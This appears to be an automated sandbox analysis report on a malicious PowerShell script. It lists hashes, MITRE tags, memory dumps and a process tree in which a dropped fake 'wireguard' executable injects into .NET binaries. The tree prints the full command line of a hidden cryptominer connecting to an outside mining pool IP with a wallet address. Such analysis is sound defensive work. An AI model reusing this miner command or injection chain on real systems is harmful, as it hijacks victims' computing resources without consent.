e6e69e85962a402a35cbc5b75571dab3739c0b2f3861ba5853dbd140bae4e4da

Analysis

max time kernel
147s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
30/06/2024, 03:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ad15ef93b3dfd73a72607e252b22a35f.ps1
Size

7.9MB
MD5

ad15ef93b3dfd73a72607e252b22a35f
SHA1

b6c705c38fd1e902e621a1dbaffd3ddcf86324ae
SHA256

e6e69e85962a402a35cbc5b75571dab3739c0b2f3861ba5853dbd140bae4e4da
SHA512

300c4f4d61127923caa74a389bd3bc580d59bd43fa54bf67ff1f4ec210744cbeb77adf2fb5ebbb385543a88e95e11a5219f1e7be791eed58ca4af84503ea0d1b
SSDEEP

49152:dhr+Tay23X23HW246dOQUhdkeqJlacvOMiVLOcDDZAIuTsGyh4W2vQntY/6bNB2l:A

Score

7^/10

execution

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3124	wireguard2-3.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3124 set thread context of 744	3124	wireguard2-3.exe	100
PID 744 set thread context of 736	744	cvtres.exe	101

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4056	powershell.exe

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
4056	powershell.exe
4056	powershell.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe
744	cvtres.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	3124	wireguard2-3.exe
Token: SeDebugPrivilege	3124	wireguard2-3.exe
Token: SeDebugPrivilege	744	cvtres.exe
Token: SeLockMemoryPrivilege	736	AddInProcess.exe
Token: SeLockMemoryPrivilege	736	AddInProcess.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
736	AddInProcess.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 4056 wrote to memory of 3124	4056	powershell.exe	89
PID 4056 wrote to memory of 3124	4056	powershell.exe	89
PID 3124 wrote to memory of 744	3124	wireguard2-3.exe	100
PID 3124 wrote to memory of 744	3124	wireguard2-3.exe	100
PID 3124 wrote to memory of 744	3124	wireguard2-3.exe	100
PID 3124 wrote to memory of 744	3124	wireguard2-3.exe	100
PID 3124 wrote to memory of 744	3124	wireguard2-3.exe	100
PID 3124 wrote to memory of 744	3124	wireguard2-3.exe	100
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101
PID 744 wrote to memory of 736	744	cvtres.exe	101

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ad15ef93b3dfd73a72607e252b22a35f.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4056
- C:\Users\Admin\AppData\Local\Temp\wireguard2-3.exe
  "C:\Users\Admin\AppData\Local\Temp\wireguard2-3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3124
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:744
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o stratum+ssl://152.42.176.136:443 -u ZEPHYR2xf9vMHptpxP6VY4hHwTe94b2L5SGyp9Czg57U8DwRT3RQvDd37eyKxoFJUYJvP5ivBbiFCAMyaKWUe9aPZzuNoDXYTtj2Z.x -p x --algo rx/0 --cpu-max-threads-hint=50
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2860,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=3940 /prefetch:8
1⤵
PID:2552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z1vgdgwz.1dq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wireguard2-3.exe

Filesize
5.8MB

MD5
4cfc63f658c6470af655d9802f4c2486

SHA1
d3c504b71986e83b17dc6c1b0ca2af3ecb691d9e

SHA256
f4d11b36a844a68bf9718cf720984468583efa6664fc99966115a44b9a20aa33

SHA512
409543a3d8f4ae258e1a561d39b5f9fff02a70c04918aa49f53fdf39d2bb7a71e7b42477c95490b38aa19d67b23c730821448d6e9e12f3f980be7207f70f62e5

Download Submit
memory/744-4930-0x0000020BFA190000-0x0000020BFA1E6000-memory.dmp

Filesize
344KB

Download
memory/744-4929-0x0000020BF9FA0000-0x0000020BF9FA8000-memory.dmp

Filesize
32KB

Download
memory/744-4928-0x0000020BF9EA0000-0x0000020BF9FA4000-memory.dmp

Filesize
1.0MB

Download
memory/744-4926-0x0000000000400000-0x00000000004B4000-memory.dmp

Filesize
720KB

Download
memory/3124-60-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-70-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-24-0x0000014C96840000-0x0000014C96E16000-memory.dmp

Filesize
5.8MB

Download
memory/3124-39-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-46-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-86-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-94-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-92-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-90-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-88-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-84-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-82-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-80-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-78-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-76-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-74-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-73-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-68-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-64-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-62-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-27-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp

Filesize
10.8MB

Download
memory/3124-58-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-52-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-50-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-48-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-4927-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp

Filesize
10.8MB

Download
memory/3124-66-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-56-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-54-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-41-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp

Filesize
10.8MB

Download
memory/3124-44-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-42-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-37-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-35-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-33-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-31-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-30-0x0000014CB1370000-0x0000014CB162A000-memory.dmp

Filesize
2.7MB

Download
memory/3124-4917-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp

Filesize
10.8MB

Download
memory/3124-4918-0x0000014CB1730000-0x0000014CB182E000-memory.dmp

Filesize
1016KB

Download
memory/3124-4919-0x0000014CB12C0000-0x0000014CB130C000-memory.dmp

Filesize
304KB

Download
memory/3124-4920-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp

Filesize
10.8MB

Download
memory/3124-4921-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp

Filesize
10.8MB

Download
memory/3124-4923-0x0000014CB1310000-0x0000014CB1364000-memory.dmp

Filesize
336KB

Download
memory/3124-29-0x0000014CB1370000-0x0000014CB1630000-memory.dmp

Filesize
2.8MB

Download
memory/4056-0-0x00007FFF00A53000-0x00007FFF00A55000-memory.dmp

Filesize
8KB

Download
memory/4056-11-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp

Filesize
10.8MB

Download
memory/4056-1-0x000001E6DD6A0000-0x000001E6DD6C2000-memory.dmp

Filesize
136KB

Download
memory/4056-12-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp

Filesize
10.8MB

Download
memory/4056-28-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp

Filesize
10.8MB

Download